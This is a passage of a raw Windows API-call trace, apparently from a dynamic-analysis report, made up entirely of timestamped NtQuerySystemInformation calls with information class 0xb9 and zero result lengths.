NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x38, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda10, Length=0x28, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda80, Length=0x28, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x38, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x28, ResultLength=0x0) [0190.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x28, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x38, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x20, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x20, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x20, ResultLength=0x0) [0190.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x20, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x38, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda60, Length=0x20, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x20, ResultLength=0x0) [0190.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x58, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0190.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x28, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x28, ResultLength=0x0) [0190.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x28, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x20, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.076] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x20, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x20, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.077] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x20, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x20, ResultLength=0x0) [0190.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x38, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x20, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0190.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x58, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x58, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.179] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x58, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d0, Length=0x28, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd870, Length=0x20, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x20, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x20, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x20, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdab0, Length=0x38, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd930, Length=0x20, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0190.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.196] NtQuerySystemInformation 